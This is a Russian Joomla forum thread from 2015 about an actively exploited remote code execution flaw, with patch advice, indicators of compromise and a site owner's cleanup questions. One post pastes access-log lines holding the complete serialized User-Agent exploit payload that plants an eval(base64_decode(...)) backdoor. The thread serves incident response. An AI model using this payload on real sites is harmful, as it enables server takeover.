Форум русской поддержки Joomla!® CMS
11.12.2016, 15:53:30 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Пишут, что опять уязвимость найдена

 (Прочитано 1202 раз)
0 Пользователей и 1 Гость смотрят эту тему.
dmtn
Давно я тут
****

Репутация: +17/-1
Offline Offline

Пол: Мужской
Сообщений: 275



« : 15.12.2015, 09:03:40 »

Пишут, что опять уязвимость найдена
http://www.opennet.ru/opennews/art.shtml?num=43521

собственно содержимое:

Разработчики свободной системы управления web-контентом Joomla опубликовали экстренное обновление 3.4.6, в котором устранена критическая уязвимость, позволяющая выполнить произвольный PHP-код на сервере. Проблема усугубляется тем, что она уже активно эксплуатируется злоумышленниками и исправлена после выявления массовой вредоносной активности на сайтах под управлением Joomla. Всем пользователям Joomla рекомендуется незамедлительно установить обновление (патчи для уже не поддерживаемых версий) и провести полный аудит своих систем.

По данным компании Sucuri в сети зафиксирована интенсивная автоматизированная атака, нацеленная на поражение систем, подверженных указанной уязвимости. После запуска нескольких подставных honeypot-систем, в течение дня на всех из них было зафиксировано более сотни попыток проникновения, поэтому после обновления следует обязательно проанализировать систему на предмет возможного проникновения атакующих. Очень высока вероятность, что система, использующая CMS Joomla, уже находится под контролем злоумышленников. Уязвимость начала активно эксплуатироваться как минимум за два дня до выхода исправления.

Проблема проявляется начиная с версии Joomla 1.5.0, выпущенной восемь лет назад, и вызвана отсутствием чистки значения строки с идентификатором браузера (User Agent), перед записью в СУБД. Для атаки достаточно отправить запрос к сайту на базе Joomla c определённым образом установленным значением User Agent. В качестве достаточного условия выявления атаки по логу, упоминается наличие запросов с IP-адресов 146.0.72.83, 74.3.170.33 и 194.28.174.106. Признаком атаки также может быть наличие в логах идентификаторов браузера (User Agent), подпадающих под маски "JDatabaseDriverMysqli" и "O:". Если подобные запросы присутствуют в логе, то можно считать систему поражённой злоумышленниками.


Прошу прощения, что продублировал, оказывается тема уже существует в форуме
http://joomlaforum.ru/index.php/topic,321787.msg1606153/topicseen.html#msg1606153
« Последнее редактирование: 15.12.2015, 09:58:19 от dmtn » Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #1 : 15.12.2015, 10:51:35 »

Проанализировал. Вроде нет )
Записан
revisium
Осваиваюсь на форуме
***

Репутация: +11/-0
Offline Offline

Пол: Мужской
Сообщений: 27



« Ответ #2 : 15.12.2015, 12:51:12 »

Есть критическая уязвимость (анонсирована позавчера), позволяющая злоумышленнику выполнить удаленный код на сайте. Печальный факт - уязвимость присутствует во всех версиях Joomla (линейка 1.5.x, 2.5.x, 3.x)
Рекомендую всем как можно быстрее установить патч, закрывающий уязвимость. Подробно можно посмотреть по ссылке

https://revisium.com/ru/blog/joomla_rce_all_versions_affected.html

Проблема из-за отсутствия фильтрации переменных запроса (в частности User Agent), и последующего их использования при запросе к БД и десериализации объектов.
Что позволяет удаленно выполнять произвольный код (читай - взломать сайт).

Патч - замена одного файла session.php, есть для Joomla 1.5 и 2.5, а для 3.4.6 лучше сразу обновиться полностью.
Записан
oleg-great
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 52



« Ответ #3 : 15.12.2015, 22:42:07 »

Есть уязвимость, верней была.
Сегодня на один сайт, на Joomla 3.4.5, в папку /libraries/joomla/добавился файл exporter.php.
Содержание файла:
Показать текстовый блок

Посмотрел вчерашнюю рез копию такого файла не было. Стал смотреть логи а там:

185.17.184.228 - - [15/Dec/2015:19:01:24 +0300] "GET / HTTP/1.0" 200 33300 "http://мойсайт.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
142.4.213.25 - - [15/Dec/2015:19:02:14 +0300] "POST / HTTP/1.0" 200 34166 "http://мойсайт.ru/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36"

и на другом сайте, он правда еще на Joomla 2.5.

5.9.36.66 - - [15/Dec/2015:19:02:26 +0300] "GET / HTTP/1.0" 302 281 "http://мойсайт2.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
197.231.221.211 - - [15/Dec/2015:19:02:42 +0300] "GET / HTTP/1.0" 200 15862 "http://мойсайт2.ru/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"

Обновился до 3.4.6
Посмотрим
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #4 : 15.12.2015, 22:49:48 »

/libraries/joomla/добавился файл exporter.php.
Содержание файла:
Показать текстовый блок

Уже взломали.
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3540


« Ответ #5 : 16.12.2015, 13:49:33 »

Обновился до 3.4.6
Посмотрим

Вам уже поздно что либо обновлять и смотреть, пора вычищать всю заразу.
Записан
oleg-great
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 52



« Ответ #6 : 16.12.2015, 16:37:57 »

Вам уже поздно что либо обновлять и смотреть, пора вычищать всю заразу.
А какую всю заразу? Появился только один новый файл, я его сразу удалил после обновился и поменял пароли. Что не так в моих действиях и о каком дополнительном вычищении идет речь?
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3540


« Ответ #7 : 16.12.2015, 20:19:41 »

А какую всю заразу? Появился только один новый файл, я его сразу удалил после обновился и поменял пароли. Что не так в моих действиях и о каком дополнительном вычищении идет речь?
С чего у Вас уверенность что только один файл появился, вы все содержимое своих файлов про сканировали на появившиеся и измененные файлы.
Записан
oleg-great
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Пол: Мужской
Сообщений: 52



« Ответ #8 : 16.12.2015, 20:58:29 »

С чего у Вас уверенность что только один файл появился, вы все содержимое своих файлов про сканировали на появившиеся и измененные файлы.
Файлы с расширением .php да все про сканировал, появился и изменился только один этот файл.
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3540


« Ответ #9 : 16.12.2015, 21:08:52 »

Файлы с расширением .php да все про сканировал, появился и изменился только один этот файл.
Если так то можете спокойно ждать, думаю что как вы пишите у вас все ок.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet